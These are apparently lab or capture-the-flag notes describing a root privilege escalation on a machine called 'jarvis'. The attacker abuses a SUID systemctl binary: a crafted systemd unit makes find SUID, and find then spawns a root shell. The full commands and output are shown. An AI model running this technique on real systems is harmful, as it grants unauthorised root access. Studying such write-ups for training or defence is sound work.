8 pepper > root

# using systemctl SUID
# had issues with GTFO bins as location of service file was not allowing symlink creation
# did it in /home/pepper
# worked

pepper@jarvis:~$ TF=kashz.service
pepper@jarvis:~$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /usr/bin/find"
> [Install]
> WantedBy=multi-user.target' > $TF

pepper@jarvis:~$ /bin/systemctl link /home/pepper/$TF
pepper@jarvis:~$ /bin/systemctl enable --now $TF
Created symlink /etc/systemd/system/multi-user.target.wants/kashz.service -> /home/pepper/kashz.service.


pepper@jarvis:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb 18  2017 /usr/bin/find
pepper@jarvis:~$ find . -exec /bin/bash -p \; -quit
bash-4.4# whoami;id;hostname
root
uid=1000(pepper) gid=1000(pepper) euid=0(root) egid=0(root) groups=0(root),1000(pepper)
jarvis

Last updated